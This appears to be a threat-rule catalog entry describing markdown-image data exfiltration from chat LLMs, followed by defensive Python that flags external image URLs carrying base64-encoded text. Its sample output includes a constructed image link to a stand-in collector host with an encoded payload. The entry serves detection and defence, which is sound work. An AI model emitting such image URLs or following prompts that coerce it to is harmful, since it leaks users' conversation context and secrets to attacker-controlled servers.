Markdown Image URL Data Exfiltration - ATR-2026-00261 (da04cba6-d7d7-5866-afd6-3bff9f29b196)
Detects prompts that coerce the LLM into emitting a markdown image reference with sensitive data encoded into the URL path or query string, exploiting auto-fetch behaviour in chat UIs. When the client renders the markdown, the browser makes a GET request to the attacker-controlled domain, leaking conversation context or retrieved secrets. Technique from NVIDIA garak xss probe family (prompt templates use concatenated strings with base64-encoded payloads in image src URIs).
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| Markdown Image URL Data Exfiltration - ATR-2026-00261 (da04cba6-d7d7-5866-afd6-3bff9f29b196) | Agent Threat Rules | LLM Data Leakage (45d378aa-20ae-401d-bf61-7f00104eeaca) | MITRE ATLAS Attack Pattern | 1 |
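
The rule above matches on prompts; a complementary output-side check is sketched here as an added example, not code from the ATR rule set or from garak. It scans model output for inline markdown images before rendering, skips an assumed host allowlist (`ALLOWED_IMAGE_HOSTS`, hypothetical), and flags URLs whose path or query carries base64 that decodes to readable text; the sample output and hostnames are constructed.

```python
import base64
import binascii
import re
from urllib.parse import unquote, urlsplit

# Assumption: hosts this chat UI may load images from (hypothetical allowlist).
ALLOWED_IMAGE_HOSTS = {"cdn.example.com"}
MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*<?([^)\s>]+)")  # inline ![alt](url)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/_-]{16,}")         # standard or URL-safe alphabet

def decodes_to_text(token):
    """True if token is valid base64 whose decoded bytes are mostly printable ASCII."""
    std = token.replace("-", "+").replace("_", "/")
    std += "=" * (-len(std) % 4)
    try:
        raw = base64.b64decode(std, validate=True)
    except (binascii.Error, ValueError):
        return False
    return bool(raw) and sum(32 <= b < 127 for b in raw) / len(raw) > 0.9

def find_exfil_images(llm_output, allowed_hosts=ALLOWED_IMAGE_HOSTS):
    """Return a finding for each image the client would fetch from a non-allowlisted host."""
    findings = []
    for match in MD_IMAGE.finditer(llm_output):
        url = match.group(1)
        try:
            parts = urlsplit(url)
            host = (parts.hostname or "").lower()
        except ValueError:
            continue  # malformed URL, not parseable as a fetch target
        if not host or host in allowed_hosts:
            continue  # relative/data URI, or a trusted image host
        # Split on URL delimiters so an encoded blob is tested on its own.
        pieces = parts.path.split("/") + re.split(r"[&=]", parts.query)
        tokens = [t for p in pieces for t in B64_TOKEN.findall(unquote(p))]
        reasons = ["external-host"]
        if any(decodes_to_text(t) for t in tokens):
            reasons.append("base64-text-in-url")
        findings.append({"url": url, "host": host, "reasons": reasons})
    return findings

# Constructed sample model output: one allowlisted image, one carrying encoded context.
SAMPLE_PAYLOAD = base64.b64encode(b"session_note=constructed sample value").decode()
SAMPLE_OUTPUT = (
    "Summary ready.\n"
    "![logo](https://cdn.example.com/img/logo.png)\n"
    f"![status](https://collector.example.net/p.png?d={SAMPLE_PAYLOAD})\n"
)

if __name__ == "__main__":
    for finding in find_exfil_images(SAMPLE_OUTPUT):
        print(finding)
```

A finding with only `external-host` is a candidate for stripping or proxying the image; one that also has `base64-text-in-url` is worth alerting on.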